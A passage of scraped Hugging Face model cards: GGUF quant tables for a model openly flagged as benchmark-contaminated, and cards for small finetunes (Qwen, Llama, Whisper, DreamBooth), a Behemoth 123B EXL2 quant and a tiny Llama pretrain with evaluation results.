| [contaminated_proof_7b_v1.0_safetensor.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q3_K_M.gguf) | Q3_K_M | 3.28GB |
| [contaminated_proof_7b_v1.0_safetensor.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q3_K_L.gguf) | Q3_K_L | 3.56GB |
| [contaminated_proof_7b_v1.0_safetensor.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.IQ4_XS.gguf) | IQ4_XS | 3.67GB |
| [contaminated_proof_7b_v1.0_safetensor.Q4_0.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q4_0.gguf) | Q4_0 | 3.83GB |
| [contaminated_proof_7b_v1.0_safetensor.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.IQ4_NL.gguf) | IQ4_NL | 3.87GB |
| [contaminated_proof_7b_v1.0_safetensor.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q4_K_S.gguf) | Q4_K_S | 3.86GB |
| [contaminated_proof_7b_v1.0_safetensor.Q4_K.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q4_K.gguf) | Q4_K | 4.07GB |
| [contaminated_proof_7b_v1.0_safetensor.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q4_K_M.gguf) | Q4_K_M | 4.07GB |
| [contaminated_proof_7b_v1.0_safetensor.Q4_1.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q4_1.gguf) | Q4_1 | 4.24GB |
| [contaminated_proof_7b_v1.0_safetensor.Q5_0.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q5_0.gguf) | Q5_0 | 4.65GB |
| [contaminated_proof_7b_v1.0_safetensor.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q5_K_S.gguf) | Q5_K_S | 4.65GB |
| [contaminated_proof_7b_v1.0_safetensor.Q5_K.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q5_K.gguf) | Q5_K | 4.78GB |
| [contaminated_proof_7b_v1.0_safetensor.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q5_K_M.gguf) | Q5_K_M | 4.78GB |
| [contaminated_proof_7b_v1.0_safetensor.Q5_1.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q5_1.gguf) | Q5_1 | 5.07GB |
| [contaminated_proof_7b_v1.0_safetensor.Q6_K.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q6_K.gguf) | Q6_K | 5.53GB |
| [contaminated_proof_7b_v1.0_safetensor.Q8_0.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q8_0.gguf) | Q8_0 | 7.17GB |
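A minimal sketch of running one of the quants above locally, assuming the `huggingface_hub` and `llama-cpp-python` packages are installed; the chosen file and generation settings are only examples (and note that the original card below warns this model is intentionally contaminated):

```py
from huggingface_hub import hf_hub_download
from llama_cpp import Llama

# Download one of the quantized files listed above (Q4_K_M as an example).
model_path = hf_hub_download(
    repo_id="RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf",
    filename="contaminated_proof_7b_v1.0_safetensor.Q4_K_M.gguf",
)

# Load the GGUF file and run a short completion.
llm = Llama(model_path=model_path, n_ctx=2048)
out = llm("Explain what benchmark contamination is.", max_tokens=64)
print(out["choices"][0]["text"])
```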
Original model description:
---
license: unknown
---
#### This model has the same weights as [Contamination/contaminated_proof_7b_v1.0](https://huggingface.co/Contamination/contaminated_proof_7b_v1.0)
# WARNING: Contamination
This model is TOTALLY CONTAMINATED, which makes the resulting model unreliable.
SO DO NOT USE THIS MODEL FOR ANY PURPOSE.
PLEASE ONLY USE FOR REFERENCE.
This model was trained with [ultrachat_200k](https://huggingface.co/datasets/HuggingFaceH4/ultrachat_200k) data to give it conversational capabilities.
# MODEL ARCHITECTURE
This model was initialized with [Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1/tree/main)
# PLEASE NOTE
Users and sponsors should be aware that many other models may be similarly unreliable. I hope our model can demonstrate the vulnerability of the leaderboard.
|
thanhkt/QWen-3B-Math | thanhkt | 2024-10-10T11:31:54Z | 52 | 0 | transformers | [
"transformers",
"safetensors",
"gguf",
"text-generation-inference",
"unsloth",
"qwen2",
"trl",
"en",
"base_model:unsloth/Qwen2.5-3B-Instruct-bnb-4bit",
"base_model:quantized:unsloth/Qwen2.5-3B-Instruct-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T11:18:16Z | ---
base_model: unsloth/Qwen2.5-3B-Instruct-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- qwen2
- trl
---
# Uploaded model
- **Developed by:** thanhkt
- **License:** apache-2.0
- **Finetuned from model :** unsloth/Qwen2.5-3B-Instruct-bnb-4bit
This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
cuongdev/vtthuc | cuongdev | 2024-10-10T11:30:50Z | 30 | 0 | diffusers | [
"diffusers",
"text-to-image",
"stable-diffusion",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | 2024-10-10T11:25:20Z | ---
license: creativeml-openrail-m
tags:
- text-to-image
- stable-diffusion
---
### vtthuc Dreambooth model trained by cuongdev with [TheLastBen's fast-DreamBooth](https://colab.research.google.com/github/TheLastBen/fast-stable-diffusion/blob/main/fast-DreamBooth.ipynb) notebook
Test the concept via A1111 Colab [fast-Colab-A1111](https://colab.research.google.com/github/TheLastBen/fast-stable-diffusion/blob/main/fast_stable_diffusion_AUTOMATIC1111.ipynb)
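If you prefer loading the weights directly with 🧨 diffusers instead of the Colab notebooks, a minimal sketch (assuming the repository holds a standard Stable Diffusion checkpoint and that `vtthuc` is the instance token used during training):

```py
import torch
from diffusers import StableDiffusionPipeline

# Load the DreamBooth checkpoint from this repository.
pipe = StableDiffusionPipeline.from_pretrained(
    "cuongdev/vtthuc", torch_dtype=torch.float16
).to("cuda")

# "vtthuc" is assumed to be the trained instance token; the prompt is only an illustration.
image = pipe("a photo of vtthuc").images[0]
image.save("vtthuc_sample.png")
```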
Sample pictures of this concept:
|
pphuc25/llama-3.1-8B-KG | pphuc25 | 2024-10-10T11:28:23Z | 39 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T11:24:43Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
sumukhshadakshari/whisper-finetuned-bial2 | sumukhshadakshari | 2024-10-10T11:27:44Z | 77 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"whisper",
"automatic-speech-recognition",
"generated_from_trainer",
"en",
"base_model:openai/whisper-tiny",
"base_model:finetune:openai/whisper-tiny",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-10-07T03:43:17Z | ---
library_name: transformers
language:
- en
license: apache-2.0
base_model: openai/whisper-tiny
tags:
- generated_from_trainer
metrics:
- wer
model-index:
- name: sumukhshadakshari/whisper-finetuned-bial2
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# sumukhshadakshari/whisper-finetuned-bial2
This model is a fine-tuned version of [openai/whisper-tiny](https://huggingface.co/openai/whisper-tiny) on the bial2 dataset.
It achieves the following results on the evaluation set:
- Loss: 0.3229
- Wer: 31.7789
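A minimal inference sketch with the 🤗 Transformers ASR pipeline; the audio path is a placeholder, and language or chunking options may need tuning for your data:

```py
from transformers import pipeline

# Load the fine-tuned Whisper-tiny checkpoint from this repository.
asr = pipeline(
    "automatic-speech-recognition",
    model="sumukhshadakshari/whisper-finetuned-bial2",
)

# Transcribe a local audio file (placeholder path).
result = asr("sample_audio.wav")
print(result["text"])
```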
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 500
- num_epochs: 5
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Wer |
|:-------------:|:-----:|:----:|:---------------:|:--------:|
| 1.4255 | 1.0 | 257 | 1.3274 | 102.7404 |
| 0.5538 | 2.0 | 514 | 0.5221 | 44.0872 |
| 0.3054 | 3.0 | 771 | 0.3637 | 30.5956 |
| 0.202 | 4.0 | 1028 | 0.3305 | 28.6649 |
| 0.1601 | 5.0 | 1285 | 0.3229 | 31.7789 |
### Framework versions
- Transformers 4.44.1
- Pytorch 2.4.1
- Datasets 2.19.1
- Tokenizers 0.19.1
|
pramattale/model_3_2_it | pramattale | 2024-10-10T11:25:17Z | 82 | 0 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"text-generation-inference",
"unsloth",
"trl",
"sft",
"conversational",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T11:20:54Z | ---
base_model: unsloth/llama-3.2-3b-instruct-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
- sft
---
# Uploaded model
- **Developed by:** pramattale
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3.2-3b-instruct-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
MikeRoz/TheDrummer_Behemoth-123B-v1-4.0bpw-h6-exl2 | MikeRoz | 2024-10-10T11:23:48Z | 5 | 0 | null | [
"safetensors",
"mistral",
"license:other",
"4-bit",
"exl2",
"region:us"
] | null | 2024-10-10T07:15:16Z | ---
license: other
---
# Join our Discord! https://discord.gg/Nbv9pQ88Xb
## 1500+ members strong 💪
---
[BeaverAI](https://huggingface.co/BeaverAI) proudly presents...
# Behemoth 123B v1 🦣
*When you spend your whole life living under a dome, even the idea of an ocean seems impossible to imagine.*

## Description
Testers have reported:
- Better creativity and variety
- Improved prose
- Less positivity, more unhinged (especially on Metharme)
- Good intelligence, sharp on nuances and recall.
## Links
- Original: https://huggingface.co/TheDrummer/Behemoth-123B-v1
- GGUF: https://huggingface.co/TheDrummer/Behemoth-123B-v1-GGUF
- iMatrix: https://huggingface.co/bartowski/Behemoth-123B-v1-GGUF (recommended for small quants)
## Arsenal (Supported Chat Templates)
- Mistral for Instruct / RP / Story
- Smart, adaptable, familiar
- Metharme (a.k.a. Pygmalion in ST) for RP / Story
- Creative, unhinged, unique
- Text Completion for RP
- You can mix it up and see which works best for you.
### Favorite RP Format
`*action* Dialogue *thoughts* Dialogue *narration*` in 1st person PoV
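For the Mistral option above, a minimal sketch of rendering a prompt with the tokenizer's chat template via 🤗 Transformers (assuming the original repository ships a Mistral-style `chat_template`; Metharme and plain text completion are handled by your frontend instead):

```py
from transformers import AutoTokenizer

# Tokenizer of the original (unquantized) repository.
tok = AutoTokenizer.from_pretrained("TheDrummer/Behemoth-123B-v1")

messages = [
    {"role": "user", "content": "Write a short scene set in a city under a glass dome."},
]

# Render the Mistral-style prompt string without tokenizing.
prompt = tok.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
print(prompt)
```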
## What's Next?
- Looking into v1.1...
- Already have plans for a v2!
## Special Thanks
- Thank you to each and every one of you who donated on [Ko-Fi](https://ko-fi.com/thedrummer) to make our venture a little bit easier.
- KinjiHakari777, Dr. Fjut, Kistara, Pseudo, AlexTheVP, Dakkidaze, EvarinSharath'fe, ONTHEREDTEAM, F, Mariana, Garg, Silva, Grozi, & **Phaelon**

<audio controls src="https://cdn-uploads.huggingface.co/production/uploads/65f2fd1c25b848bd061b5c2e/FNWdi0WlH-Xd3fjkGVPpp.mpga"></audio>
|
tangledgroup/tangled-llama-t-128k-base-v0.1 | tangledgroup | 2024-10-10T11:20:13Z | 11 | 0 | transformers | [
"transformers",
"llama",
"text-generation",
"litgpt",
"litdata",
"conversational",
"en",
"am",
"ar",
"as",
"az",
"be",
"bg",
"bn",
"br",
"bs",
"ca",
"cs",
"cy",
"da",
"de",
"el",
"eo",
"es",
"et",
"eu",
"fa",
"ff",
"fi",
"fr",
"fy",
"ga",
"gd",
"gl",
"gn",
"gu",
"ha",
"he",
"hi",
"hr",
"ht",
"hu",
"hy",
"id",
"ig",
"is",
"it",
"ja",
"jv",
"ka",
"kk",
"km",
"kn",
"ko",
"ku",
"ky",
"la",
"lg",
"li",
"ln",
"lo",
"lt",
"lv",
"mg",
"mk",
"ml",
"mn",
"mr",
"ms",
"my",
"ne",
"nl",
"no",
"ns",
"om",
"or",
"pa",
"pl",
"ps",
"pt",
"qu",
"rm",
"ro",
"ru",
"sa",
"si",
"sc",
"sd",
"sk",
"sl",
"so",
"sq",
"sr",
"ss",
"su",
"sv",
"sw",
"ta",
"te",
"th",
"tl",
"tn",
"tr",
"ug",
"uk",
"ur",
"uz",
"vi",
"wo",
"xh",
"yi",
"yo",
"zu",
"dataset:yahma/alpaca-cleaned",
"dataset:gbharti/wealth-alpaca_lora",
"dataset:databricks/databricks-dolly-15k",
"dataset:VMware/open-instruct",
"dataset:saillab/taco-datasets",
"dataset:xu-song/cc100-samples",
"dataset:jordiclive/wikipedia-summary-dataset",
"dataset:bigcode/the-stack-smol-xs",
"dataset:m-a-p/CodeFeedback-Filtered-Instruction",
"dataset:jtatman/python-code-dataset-500k",
"dataset:iamtarun/python_code_instructions_18k_alpaca",
"dataset:HuggingFaceH4/CodeAlpaca_20K",
"dataset:cognitivecomputations/dolphin-coder",
"dataset:fblgit/simple-math",
"dataset:gair-prox/open-web-math-pro",
"dataset:rvv-karma/Math-QA",
"dataset:ajibawa-2023/Maths-College",
"dataset:microsoft/orca-math-word-problems-200k",
"dataset:meta-math/MetaMathQA",
"dataset:TIGER-Lab/MathInstruct",
"dataset:TIGER-Lab/WebInstructSub",
"dataset:SkunkworksAI/reasoning-0.01",
"dataset:KingNish/reasoning-base-20k",
"dataset:Magpie-Align/Magpie-Reasoning-150K",
"dataset:thesven/gsm8k-reasoning",
"dataset:AlgorithmicResearchGroup/math_reasoning_autoformalization_track",
"dataset:badrex/llm-emoji-dataset",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-06T16:24:54Z | ---
license: apache-2.0
pipeline_tag: text-generation
library_name: transformers
language: [
'en', 'am', 'ar', 'as', 'az', 'be', 'bg', 'bn', 'br', 'bs', 'ca', 'cs', 'cy', 'da', 'de', 'el',
'eo', 'es', 'et', 'eu', 'fa', 'ff', 'fi', 'fr', 'fy', 'ga', 'gd', 'gl', 'gn', 'gu', 'ha', 'he',
'hi', 'hr', 'ht', 'hu', 'hy', 'id', 'ig', 'is', 'it', 'ja', 'jv', 'ka', 'kk', 'km', 'kn', 'ko',
'ku', 'ky', 'la', 'lg', 'li', 'ln', 'lo', 'lt', 'lv', 'mg', 'mk', 'ml', 'mn', 'mr', 'ms', 'my',
'ne', 'nl', 'no', 'ns', 'om', 'or', 'pa', 'pl', 'ps', 'pt', 'qu', 'rm', 'ro', 'ru', 'sa', 'si',
'sc', 'sd', 'sk', 'sl', 'so', 'sq', 'sr', 'ss', 'su', 'sv', 'sw', 'ta', 'te', 'th', 'tl', 'tn',
'tr', 'ug', 'uk', 'ur', 'uz', 'vi', 'wo', 'xh', 'yi', 'yo', 'zu',
]
datasets: [
'yahma/alpaca-cleaned',
'gbharti/wealth-alpaca_lora',
'databricks/databricks-dolly-15k',
'VMware/open-instruct',
'saillab/taco-datasets',
'xu-song/cc100-samples',
'jordiclive/wikipedia-summary-dataset',
'bigcode/the-stack-smol-xs',
'm-a-p/CodeFeedback-Filtered-Instruction',
'jtatman/python-code-dataset-500k',
'iamtarun/python_code_instructions_18k_alpaca',
'HuggingFaceH4/CodeAlpaca_20K',
'cognitivecomputations/dolphin-coder',
'fblgit/simple-math',
'gair-prox/open-web-math-pro',
'rvv-karma/Math-QA',
'ajibawa-2023/Maths-College',
'microsoft/orca-math-word-problems-200k',
'meta-math/MetaMathQA',
'TIGER-Lab/MathInstruct',
'TIGER-Lab/WebInstructSub',
'SkunkworksAI/reasoning-0.01',
'KingNish/reasoning-base-20k',
'Magpie-Align/Magpie-Reasoning-150K',
'thesven/gsm8k-reasoning',
'AlgorithmicResearchGroup/math_reasoning_autoformalization_track',
'badrex/llm-emoji-dataset',
]
tags:
- litgpt
- litdata
---
# tangled-llama-t-128k-base-v0.1

A pretrained language model based on the Llama model with about **25M** parameters. This model has been trained on **22.1B** (`22,111,299,936`) tokens from more than **3.6M** (`3,597,088`) dataset rows.
This model **isn't** designed for immediate use but rather for Continued Pretraining and Finetuning on a downstream task. While it can handle a context length of up to **128K** (`131,072`) tokens, it was pretrained with sequences of **2K** (`2048`) tokens.
The objective is to streamline the cognitive or reasoning core, eliminating any redundant knowledge from the model.
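Since the checkpoint targets continued pretraining and finetuning rather than direct use, a minimal sketch of loading it as a starting point with 🤗 Transformers (assuming the exported weights load with the standard Llama classes):

```py
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

repo = "tangledgroup/tangled-llama-t-128k-base-v0.1"

tokenizer = AutoTokenizer.from_pretrained(repo)
model = AutoModelForCausalLM.from_pretrained(repo, torch_dtype=torch.bfloat16)

# From here, plug the model into your own continued-pretraining or SFT loop,
# e.g. with litgpt, TRL, or a plain PyTorch training script.
print(sum(p.numel() for p in model.parameters()), "parameters")
```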
[loss, val_loss](https://api.wandb.ai/links/mtasic85/t66yvgeh)
[val_ppl](https://api.wandb.ai/links/mtasic85/osr62qqd)
[epoch](https://api.wandb.ai/links/mtasic85/pw0ilz5s)
[learning_rate](https://api.wandb.ai/links/mtasic85/867ueoyx)
## lm-evaluation-harness
```bash
litgpt evaluate --tasks 'hellaswag,gsm8k,truthfulqa_mc2,mmlu,winogrande,arc_challenge' --out_dir 'evaluate-quick/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
|Tasks |Version| Filter |n-shot| Metric | |Value | |Stderr|
|---------------------------------------|------:|----------------|-----:|-----------|---|-----:|---|-----:|
|arc_challenge | 1|none | 0|acc |↑ |0.1971|± |0.0116|
| | |none | 0|acc_norm |↑ |0.2423|± |0.0125|
|gsm8k | 3|flexible-extract| 5|exact_match|↑ |0.0099|± |0.0027|
| | |strict-match | 5|exact_match|↑ |0.0000|± |0.0000|
|hellaswag | 1|none | 0|acc |↑ |0.2608|± |0.0044|
| | |none | 0|acc_norm |↑ |0.2665|± |0.0044|
|mmlu | 2|none | |acc |↑ |0.2451|± |0.0036|
| - humanities | 2|none | |acc |↑ |0.2470|± |0.0063|
| - formal_logic | 1|none | 0|acc |↑ |0.3254|± |0.0419|
| - high_school_european_history | 1|none | 0|acc |↑ |0.2545|± |0.0340|
| - high_school_us_history | 1|none | 0|acc |↑ |0.2745|± |0.0313|
| - high_school_world_history | 1|none | 0|acc |↑ |0.2194|± |0.0269|
| - international_law | 1|none | 0|acc |↑ |0.2231|± |0.0380|
| - jurisprudence | 1|none | 0|acc |↑ |0.2685|± |0.0428|
| - logical_fallacies | 1|none | 0|acc |↑ |0.2025|± |0.0316|
| - moral_disputes | 1|none | 0|acc |↑ |0.2457|± |0.0232|
| - moral_scenarios | 1|none | 0|acc |↑ |0.2670|± |0.0148|
| - philosophy | 1|none | 0|acc |↑ |0.1865|± |0.0221|
| - prehistory | 1|none | 0|acc |↑ |0.2500|± |0.0241|
| - professional_law | 1|none | 0|acc |↑ |0.2523|± |0.0111|
| - world_religions | 1|none | 0|acc |↑ |0.1871|± |0.0299|
| - other | 2|none | |acc |↑ |0.2456|± |0.0077|
| - business_ethics | 1|none | 0|acc |↑ |0.3400|± |0.0476|
| - clinical_knowledge | 1|none | 0|acc |↑ |0.2113|± |0.0251|
| - college_medicine | 1|none | 0|acc |↑ |0.2543|± |0.0332|
| - global_facts | 1|none | 0|acc |↑ |0.1800|± |0.0386|
| - human_aging | 1|none | 0|acc |↑ |0.1749|± |0.0255|
| - management | 1|none | 0|acc |↑ |0.3398|± |0.0469|
| - marketing | 1|none | 0|acc |↑ |0.2479|± |0.0283|
| - medical_genetics | 1|none | 0|acc |↑ |0.3100|± |0.0465|
| - miscellaneous | 1|none | 0|acc |↑ |0.2171|± |0.0147|
| - nutrition | 1|none | 0|acc |↑ |0.2647|± |0.0253|
| - professional_accounting | 1|none | 0|acc |↑ |0.2270|± |0.0250|
| - professional_medicine | 1|none | 0|acc |↑ |0.2978|± |0.0278|
| - virology | 1|none | 0|acc |↑ |0.3133|± |0.0361|
| - social sciences | 2|none | |acc |↑ |0.2584|± |0.0079|
| - econometrics | 1|none | 0|acc |↑ |0.2193|± |0.0389|
| - high_school_geography | 1|none | 0|acc |↑ |0.2677|± |0.0315|
| - high_school_government_and_politics| 1|none | 0|acc |↑ |0.2435|± |0.0310|
| - high_school_macroeconomics | 1|none | 0|acc |↑ |0.2538|± |0.0221|
| - high_school_microeconomics | 1|none | 0|acc |↑ |0.2647|± |0.0287|
| - high_school_psychology | 1|none | 0|acc |↑ |0.2679|± |0.0190|
| - human_sexuality | 1|none | 0|acc |↑ |0.3435|± |0.0416|
| - professional_psychology | 1|none | 0|acc |↑ |0.2190|± |0.0167|
| - public_relations | 1|none | 0|acc |↑ |0.2091|± |0.0390|
| - security_studies | 1|none | 0|acc |↑ |0.2980|± |0.0293|
| - sociology | 1|none | 0|acc |↑ |0.2836|± |0.0319|
| - us_foreign_policy | 1|none | 0|acc |↑ |0.3000|± |0.0461|
| - stem | 2|none | |acc |↑ |0.2287|± |0.0075|
| - abstract_algebra | 1|none | 0|acc |↑ |0.2100|± |0.0409|
| - anatomy | 1|none | 0|acc |↑ |0.2000|± |0.0346|
| - astronomy | 1|none | 0|acc |↑ |0.2434|± |0.0349|
| - college_biology | 1|none | 0|acc |↑ |0.3333|± |0.0394|
| - college_chemistry | 1|none | 0|acc |↑ |0.3000|± |0.0461|
| - college_computer_science | 1|none | 0|acc |↑ |0.2600|± |0.0441|
| - college_mathematics | 1|none | 0|acc |↑ |0.3100|± |0.0465|
| - college_physics | 1|none | 0|acc |↑ |0.2353|± |0.0422|
| - computer_security | 1|none | 0|acc |↑ |0.2300|± |0.0423|
| - conceptual_physics | 1|none | 0|acc |↑ |0.2085|± |0.0266|
| - electrical_engineering | 1|none | 0|acc |↑ |0.2621|± |0.0366|
| - elementary_mathematics | 1|none | 0|acc |↑ |0.2011|± |0.0206|
| - high_school_biology | 1|none | 0|acc |↑ |0.2097|± |0.0232|
| - high_school_chemistry | 1|none | 0|acc |↑ |0.2217|± |0.0292|
| - high_school_computer_science | 1|none | 0|acc |↑ |0.2300|± |0.0423|
| - high_school_mathematics | 1|none | 0|acc |↑ |0.1926|± |0.0240|
| - high_school_physics | 1|none | 0|acc |↑ |0.2318|± |0.0345|
| - high_school_statistics | 1|none | 0|acc |↑ |0.1806|± |0.0262|
| - machine_learning | 1|none | 0|acc |↑ |0.2857|± |0.0429|
|truthfulqa_mc2 | 2|none | 0|acc |↑ |0.4880|± |0.0161|
|winogrande | 1|none | 0|acc |↑ |0.5185|± |0.0140|
| Groups |Version|Filter|n-shot|Metric| |Value | |Stderr|
|------------------|------:|------|------|------|---|-----:|---|-----:|
|mmlu | 2|none | |acc |↑ |0.2451|± |0.0036|
| - humanities | 2|none | |acc |↑ |0.2470|± |0.0063|
| - other | 2|none | |acc |↑ |0.2456|± |0.0077|
| - social sciences| 2|none | |acc |↑ |0.2584|± |0.0079|
| - stem | 2|none | |acc |↑ |0.2287|± |0.0075|
```bash
litgpt evaluate --tasks 'leaderboard' --out_dir 'evaluate-leaderboard/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
| Tasks |Version|Filter|n-shot| Metric | |Value | |Stderr|
|-----------------------------------------------------------|-------|------|-----:|-----------------------|---|-----:|---|------|
|leaderboard | N/A| | | | | | | |
| - leaderboard_bbh | N/A| | | | | | | |
| - leaderboard_bbh_boolean_expressions | 1|none | 3|acc_norm |↑ |0.4600|± |0.0316|
